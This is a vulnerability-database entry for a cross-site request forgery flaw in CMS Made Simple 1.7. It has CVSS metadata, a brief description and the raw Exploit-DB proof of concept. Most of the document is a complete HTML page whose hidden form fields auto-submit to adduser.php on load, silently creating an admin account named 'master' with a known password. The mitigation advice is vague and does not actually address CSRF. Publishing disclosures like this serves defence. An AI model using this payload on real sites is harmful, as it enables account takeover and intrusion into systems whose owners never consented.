CMS Made Simple 1.7 CSRF Vulnerability

vendor:

CMS Made Simple 1.7

by:

Pratul Agrawal

8,8

CVSS

HIGH

Cross Site Request Forgery (CSRF)

352

CWE

Product Name: CMS Made Simple 1.7

Affected Version From: 1.7

Affected Version To: 1.7

Patch Exists: Yes

Related CWE: N/A

CPE: a:cms_made_simple:cms_made_simple:1.7

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: php

2020

CMS Made Simple 1.7 CSRF Vulnerability

A Cross Site Request Forgery (CSRF) vulnerability was found in CMS Made Simple 1.7. An attacker could exploit this vulnerability by crafting a malicious HTML page that, when visited by an authenticated user, would add an admin user to the CMS Made Simple 1.7 system. The malicious HTML page would contain a form with hidden fields that would submit the user credentials to the adduser.php page. The attacker could then use the newly created admin user to gain access to the CMS Made Simple 1.7 system.

Mitigation:

To mitigate this vulnerability, users should ensure that they are running the latest version of CMS Made Simple 1.7 and that they are using strong passwords for their admin accounts.

Source

Exploit-DB raw data:

                                =======================================================================
   
                                                CMS Made Simple 1.7 CSRF Vulnerability
 
                                =======================================================================
   
                                                              
 
   
   
  # Vulnerability found in- Admin module
   
  # email         Pratulag@yahoo.com
   
  # company       aksitservices
   
  # Credit by     Pratul Agrawal
 
  # Software      CMS Made Simple 1.7

  # Category  	  CMS / Portals
  
  # Site p4ge     http://server/demo/2/10/CMS_Made_Simple
  
  # Plateform     php

  # Greetz to     Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun, sameer (My Web Team)
  
   
   
  #  Proof of concept   #
 
  Targeted URL:  http://sever/demo/2/10/CMS_Made_Simple
  
 
   Script to Add admin user through Cross Site request forgery
   
             .  ................................................................................................................
   
                         <html>

                          <body>

                             <form name="csrf" action="http://server/cmsmadesimple/admin/adduser.php" method="post">

                                    <input type=hidden name="sp_" value="64becc90">

                                    <input type=hidden name="user" value="master">

                                    <input type=hidden name="password" value="master">

                                    <input type=hidden name="passwordagain" value="master">

                                    <input type=hidden name="firstname" value="12345">

                                    <input type=hidden name="lastname" value="12345">

                                    <input type=hidden name="email" value="aa@aa.com">

                                    <input type=hidden name="active" value="on">

                                    <input type=hidden name="groups" value="1">

                                    <input type=hidden name="g1" value="1">

                                    <input type=hidden name="adduser" value="true">

              
                             </form>

                               <script>

                                 document.csrf.submit();

                               </script>

                          </body>

                        </html>
   
             .  ..................................................................................................................
   
   
   
  After execution just refresh the page and we can see that the admin user added automatically.
  
  
  #If you have any questions, comments, or concerns, feel free to contact me.